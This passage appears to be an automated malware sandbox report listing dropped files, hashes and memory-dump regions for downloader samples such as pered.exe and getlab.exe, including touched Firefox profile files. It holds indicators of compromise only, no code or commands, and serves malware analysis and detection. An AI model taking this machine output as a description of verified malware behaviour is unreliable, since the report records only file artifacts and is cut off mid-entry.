| MD5 | 86786ae2cc5a65ed1165cf8ed3f3fc2a |
| SHA1 | fd800caddffd66b43f4082159a936f34115e18d2 |
| SHA256 | 109ecea602641776ea908b5d4b4bb83dea467b6ff1652e21d840595ae6cf65bb |
| SHA512 | aca25a50f764c29ac6848b73356d6221cb40e4395309aaf92631fcd720cd67870197f0f9a1d5117ec9da3a9920e599f895dc68aa2e828b5cef16aa7c48f145c9 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\pending_pings\2e8f2d02-8e09-4e88-a597-a17833646b75
| MD5 | 228734b56b26f25e44aa008cfcff8d7e |
| SHA1 | 270a21274b8f503d597a65f67f7e7018cf4b94e7 |
| SHA256 | ecfb7ec6281faa52b17e073c761fb7d90fbaf4855df778c1a6a038e863bf92a9 |
| SHA512 | 79a78668e58c02a627474e92353a5152c03ce620167d297fdd902faec660895b9c81aaf6d43512b3587e5e3c1a4c9a1f228be54202c725c41135ae6321b9935e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\pending_pings\2f519624-ac36-4dce-910b-0c169841ed15
| MD5 | 585d7a36c6d89ee5ff1c87c317953ba8 |
| SHA1 | 0f9eedab9306a985804df9fedd1e90b89f6677fe |
| SHA256 | 81aa7c28f0e4286aa56950654bb0c7563ce887385e466c4f25ae15ccd08fa29d |
| SHA512 | 2b8bb0082cd534fdc2686077101bb7c5c281f649027fe1c3d70b3070684e55215a5cb034b1239c76717fa0349fba524d2867eb5f05ee93063fa77ae2087d7a70 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\db\data.safe.bin
| MD5 | 24027edb6f2b4851b27b87be7b9ac684 |
| SHA1 | 36b37c9c78feb54873f0c1f48ddda9cb651a3506 |
| SHA256 | b0e253b125f8d463d6bac4ae3f90cde42b96d9308b3bb56cd268cbb1a0e2519d |
| SHA512 | cb6fe41e50be9fc23ae53d25898633bc246379c8eeae2799f96b9d79fdca9c68908af0f2daf4c0851087a7ed1f50a2e988838a28e162f2f72b57e55e21e76ed5 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | c77ef3ac5691937794a4b654438ae001 |
| SHA1 | bc4d88b6b41c465c66801b19a8ee908762d09135 |
| SHA256 | 868f3a4a2c8e846b8bfdd1bd3189b06f9a4eaa9cf3f9ddbe6dc5e10e90b46f63 |
| SHA512 | 91fc8d1451a059e1c8ef5a7a0481d3dc9db4339db04f91d15bdcc174806db6a72cc6a9d15c6e96f219e1555ccf9fd2d3b1aa5b94f5c2cac2a51942316b360bee |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
| MD5 | 96c542dec016d9ec1ecc4dddfcbaac66 |
| SHA1 | 6199f7648bb744efa58acf7b96fee85d938389e4 |
| SHA256 | 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798 |
| SHA512 | cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\prefs.js
| MD5 | ef93205dd26e7d8f6d09c94a485c0f16 |
| SHA1 | e679e7a9bf8883ca44e52204d97a3815f5bdd703 |
| SHA256 | a5c6f82d73126cd53d530eb6cbb738a3c475dbe57d59e6b533e7c70f3b19fbf4 |
| SHA512 | aaee0f773f6e83b87fe86ce9bc877c3e0dbe34d718db0c31a7ad5bef0779ca732c2624b3225ab4df6a4033fc90f9ff83d821092a4a04dab2ef99532a9ccf3561 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | 956381e891de665f7457eda961e71331 |
| SHA1 | 29d0519ad97a52bf0f43991355583e153de0e018 |
| SHA256 | dfd32270fc04f2b89a170fdc2b305ccff9e7563409c5a585b808390871c01785 |
| SHA512 | 18c0d38f855fdd81c34a55f3e86f2ba7a77a68ff16773ac823095940cc0aff5cf307bb2beedb2e961b2d7a3cb4a8287d1a9fbc8ac8598b73bf94f8de4031b85a |
\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\pered.exe
| MD5 | faf1270013c6935ae2edaf8e2c2b2c08 |
| SHA1 | d9a44759cd449608589b8f127619d422ccb40afa |
| SHA256 | 1011889e66c56fd137bf85b832c4afc1fd054222b2fcbaae6608836d27e8f840 |
| SHA512 | 4a9ca18f796d4876effc5692cfeb7ce6d1cffdd2541b68753f416d2b0a7eff87588bc05793145a2882fc62a48512a862fa42826761022fed1696c20864c89098 |
\Users\Admin\AppData\Local\Temp\_MEI11362\api-ms-win-core-timezone-l1-1-0.dll
| MD5 | 683d6579333e3973206b54af6be2c5ea |
| SHA1 | e9aebf6246633ead1750acbfaae4fdd6f767bec9 |
| SHA256 | c446925083f68506717f84e9303d1ac9394bd32c1d98087784499f103617f1d2 |
| SHA512 | 858f87f00a28cf66215298673bbb8b4ef24ef7a160b932dfed421d4c5d78f469aea0c712d97cf154a264425137a25651d230a4137e1c6bdd4992096acf8370c7 |
C:\Users\Admin\AppData\Local\Temp\_MEI11362\python310.dll
| MD5 | c80b5cb43e5fe7948c3562c1fff1254e |
| SHA1 | f73cb1fb9445c96ecd56b984a1822e502e71ab9d |
| SHA256 | 058925e4bbfcb460a3c00ec824b8390583baef0c780a7c7ff01d43d9eec45f20 |
| SHA512 | faa97a9d5d2a0bf78123f19f8657c24921b907268938c26f79e1df6d667f7bee564259a3a11022e8629996406cda9fa00434bb2b1de3e10b9bddc59708dbad81 |
\Users\Admin\AppData\Local\Temp\_MEI11362\api-ms-win-core-file-l1-2-0.dll
| MD5 | fb8b3af45dca952911937032195294b8 |
| SHA1 | d4acbd029249c205a3c241731738a7b6ea07e685 |
| SHA256 | 4b0f7c14614724b0a54d236efa2f346dcc0bc37d995503c54ff630a7d20c7883 |
| SHA512 | e53486631886a4b9e2470b7409bad5c160946912c999df2180c313f052877c58b7574d73ec901db8a53c3663fd59cb36010842fd9ed7fafb64ab786ab4058a7f |
\Users\Admin\AppData\Local\Temp\_MEI11362\api-ms-win-core-processthreads-l1-1-1.dll
| MD5 | 5fbb3fc0ca37ed94744d6af8638b7c9a |
| SHA1 | 09415405267ee64c92e0fd43ead7dbfe2f028647 |
| SHA256 | 4c0ba89e487ec98966cc0b68bdeb07bbeb958f3a4ad866382a4185baf31f9041 |
| SHA512 | 150d318ef5480d9f0e23ee23ae5ba7eb070996e4cae0746d6a5ba53b716ecfbc694ad8044e4aa7d7dc16984b2af26f01e5ca6f665ac73c878f6a18fc60364453 |
\Users\Admin\AppData\Local\Temp\_MEI11362\api-ms-win-core-localization-l1-2-0.dll
| MD5 | 0f38dd38b314e7e7ada9f09506d9df32 |
| SHA1 | 5c83750cf4aea5293d704df043f505ea4d05e239 |
| SHA256 | 5f3dc66fb6ed58b324512c57ef781d1092c1c2ae7e0cb5d287907f9b4bb77248 |
| SHA512 | c80dfdf3a3eeefacf631f31691aec278d01b08b4c2ec151d3eeef2256c37202ff6aad363f872e7f9d8b969663db72f213f68e3d4e709a2df39fce643689d1604 |
\Users\Admin\AppData\Local\Temp\_MEI11362\api-ms-win-core-file-l2-1-0.dll
| MD5 | afb7cd2310f1c2a3a5a1cc7736697487 |
| SHA1 | d435168703dba9a2b6e955a1332111687a4d09d7 |
| SHA256 | 2e75641d7330b804c3cc6ef682306d2b0f89c4358dac3e1376b5fb2ebd6e2838 |
| SHA512 | 3a05ff62f4c2cd71d5ecd5732c9d3f8ef91077a056e4082530fed64409b26cab7f4617e03ca65faf1738faffec49f2de65f0f082cbbda1b12bdd07b85b985c26 |
\Users\Admin\AppData\Local\Temp\_MEI11362\ucrtbase.dll
| MD5 | cd7a487bb5ca20005a81402eee883569 |
| SHA1 | f427aaf18b53311a671e60b94bd897a904699d19 |
| SHA256 | f4723261c04974542a2c618fe58f4995f2dcaf6996656bb027d65adeeca6caf7 |
| SHA512 | 24da7a345429f2bc7a1b1e230f2d4400b8d57ecdf822d87d63fd4db0aed888b3ea3e98f8cb3f5b83986bfb846c1bd6eac2ac9382caba267c6ceca6ee77d79417 |
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\getlab.exe
| MD5 | 348401b1f67ac4aa44c9d0d096b54d4f |
| SHA1 | 441ad959d0cc4fae5bba6096a3ab858346019c31 |
| SHA256 | e6a8b22931cc19e7922852645e46d7e8a4cb66f3fa56b45f6dfced6f6a0ca491 |
| SHA512 | ef6540033302cdc346eb3ff3c4032a690ea54442644e2ee735a7669bdb6f03d0c1020ace396a58204c62dba3f04b54bb2b6ee236cb35896aea88359dee8e56a1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | b29b84cf5ab30b9eaa3f562ea51ddfd7 |
| SHA1 | 064bacf9e129fa6f4cbd42df837ad72e75f401fa |
| SHA256 | 7c4394c76d74ed8791f62506d8463ecac76f86673574836054a56322c6196973 |
| SHA512 | 4b31570f4b4718aad826e936b57d6ee80e70946eba2db438fde79eb826c7de8fada39bef908705947b3b8bbc0d032ff58401b97e14cc520e5ddc2caf85bd9c7d |
memory/3232-303-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-H4VJ0.tmp\getlab.tmp
| MD5 | a79e2717dea9776d2b876b96c5bbb50d |
| SHA1 | b58503e92a5098a9682ad87d6a0952a1f4da2e3c |
| SHA256 | d2c13dc08c217ea037228ea15a9bb0914843f979a4aec4b6fb9733add13756e7 |
| SHA512 | a4230b154addfc35499c45e8f35d017aa55ffad7040385a1459938f20fa36b45c3ff41fc22681d63b4fd0309582bcc7875cf61f762c5f3cae9720d69c7df30df |
\Users\Admin\AppData\Local\Temp\is-PEI52.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
\Users\Admin\AppData\Local\Temp\is-PEI52.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
memory/3548-362-0x0000000000400000-0x00000000006E9000-memory.dmp
\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\sqlite3.dll
| MD5 | e477a96c8f2b18d6b5c27bde49c990bf |
| SHA1 | e980c9bf41330d1e5bd04556db4646a0210f7409 |
| SHA256 | 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660 |
| SHA512 | 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c |
C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe
| MD5 | bcb92f39b938e165c0453bff7137c44a |
| SHA1 | 4a7ac193b30a8c6bedfafb8cdfcb0c194d34a2c2 |
| SHA256 | eaaba870d735ae2992565c253955bafc1fddc4c12dfbec8fc3ee06f49b0d0cbd |
| SHA512 | fc1d78b367fbebb32e1e7c1f560cb97abce47f232a6f66e7df403f6700cdf3d69464b1e0e8af6dccb341cb2916fbff4961a6f317c4ef0480e178514bd7328f5f |
memory/3292-358-0x0000000003B40000-0x0000000003E29000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\prefs.js
| MD5 | 4395bdc57af42b1deb224e3ad7ab5711 |
| SHA1 | c16d94624a610a8fad299d709d5bb6e19b21c323 |
| SHA256 | 6ea64861a7114be98461271d7c297214062ed35326b70096971915e0dc43406c |
| SHA512 | 7bccaeb9c78c591bf5ebb1ac3d3b1a007626290487491a66a9e8b0ed1e6b5ce1db24e24472129e0a84fcf6aafb7ea0a3864da217eaab8fd470fdb989f6b872a5 |
memory/3548-373-0x0000000000400000-0x00000000006E9000-memory.dmp
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1bogwdvw.default-release\cache2\entries\C500E8C3949C9252B3999969CAB31B7432CC6DA1
| MD5 | d7358108fcd1573bebd4526f7f3b02f4 |
| SHA1 | 647b0cd21869eaccf1134587f7373722afd7e60e |
| SHA256 | 313da147e1eb4c5c2f9d65b2dc32ea15804f0763e4a2b976d57e9ade05d9058e |
| SHA512 | 1c8737d3b15c6c65b784da58ea80ec6bc7f8bc9e6ea94b6d700e1bb14dabaf079ddaef0e081de2baef0aef9ab9295a74056ec4cc877a29ba7e7a54b350ecbbe6 |
memory/3292-456-0x0000000003B40000-0x0000000003E29000-memory.dmp
memory/3232-460-0x0000000000400000-0x0000000000414000-memory.dmp
memory/3292-461-0x0000000000400000-0x00000000004BC000-memory.dmp
memory/3548-464-0x0000000000400000-0x00000000006E9000-memory.dmp
memory/3548-462-0x0000000000400000-0x00000000006E9000-memory.dmp
memory/3548-463-0x0000000060900000-0x0000000060992000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | c30f7a19eb49e3a3b943bfaadc79665b |
| SHA1 | 04997d80d9e32f05d76798753a1ff19b044c011b |
| SHA256 | 05d966d006a7e08198a6fe00c153999826dbe527c9bceafbb16c131f7e0ebf82 |
| SHA512 | 16575f1b199cb8f94607a382a76cd181fb01c00390b07d11b8e79f67cb4fae685e01c7703e8b155fbb161d20d55f726d42558e621a569e6946c0585a12521d9d |
memory/3548-475-0x0000000000400000-0x00000000006E9000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\prefs-1.js
| MD5 | 353bd564182fa07dfe3195d06bcad333 |
| SHA1 | 85348fad1838459405f5da8e564a39b826cb1758 |
| SHA256 | 65d27d880577c12e4cf7286ec67b5e75169e83fbf7f0ffebe778228bee9b29e1 |
| SHA512 | 0d77117eae10ec1d82db1834c47d72a78fb854d10c40a0ced358f14cfb730f889efbd397e05b0f070cc77e3f8860fb76161a7cf900e1418ef86ca63feec616ab |
memory/3548-492-0x0000000000400000-0x00000000006E9000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 44f87c31dbd637ac70c07e1da056327f |
| SHA1 | d7684b40615d5f08a2941ded63b869b71e27254b |
| SHA256 | 435f6982dd938a402940b6cd6d0858951b5757d0a4722a7eeacb93c781030042 |
| SHA512 | 1f9d0e7a0c617ca5d448cf51552f19f5cc9875778c1c82299ba67ae924579dcbd43b58a9357b70ad73fccab2866cca397db8021b056719e3ba29a348cd9b57ab |
memory/3548-518-0x0000000000400000-0x00000000006E9000-memory.dmp
memory/3548-678-0x0000000000400000-0x00000000006E9000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | c9ac1e65a330cda834e26d5147f03253 |
| SHA1 | e9db762572a4546fb65fd7abccebec80dd378ce9 |
| SHA256 | fb323c758cd85fa11746037b9bb6a91ad72422a21f6ae67bab167992aee1c316 |